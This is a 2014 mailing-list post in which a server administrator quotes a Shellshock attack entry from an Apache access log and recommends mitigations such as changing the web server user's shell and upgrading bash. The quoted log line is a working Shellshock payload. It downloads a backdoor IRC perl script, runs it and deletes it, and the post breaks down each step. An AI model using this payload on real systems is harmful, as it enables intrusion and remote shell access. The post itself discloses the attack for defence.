[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

First wave attack on Linux/Apache2

From: BillyBob Overalls
Subject: First wave attack on Linux/Apache2
Date: Thu, 25 Sep 2014 22:40:19 -0700 (PDT)
User-agent: G2/1.0

Entry from my Linux Apache2 access-log:
1038 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl
 /var/tmp/wow1;rm -rf /var/tmp/wow1\""

wow1 is a hacked stealth IRC perl script that will give the hacker shell 
access.  If that script is present in /var/tmp, chances are your hacker is 
still in your box.  If it is not, it does not mean you are safe.

This command (from the log entry above) downloads the script to your system:

wget -O /var/tmp/wow1

This one executes it:

perl /var/tmp/wow1

And when it exits, it is deleted.

rm -rf /var/tmp/wow1

THINGS YOU (or your administrator) CAN DO:

Find the user credentials your web server executes as in /etc/passwd and change 
the login shell to /bin/false -- or something that doesn't exist. Then restart 
apache.  If the web server can't invoke a shell, it can't set a variable or 
call /bin/bash to do the hacker's dirty work.

Be advised that this work-around will only patch the hole in your web server.  
Many other exploits are possible.  

Upgrade bash to 4.3.25 immediately, and hide all other shells.  At least one 
version each of sh and csh have been found to have the same vulnerability.  
Don't leave them where a hacker can expect to find them.

reply via email to

[Prev in Thread] Current Thread [Next in Thread]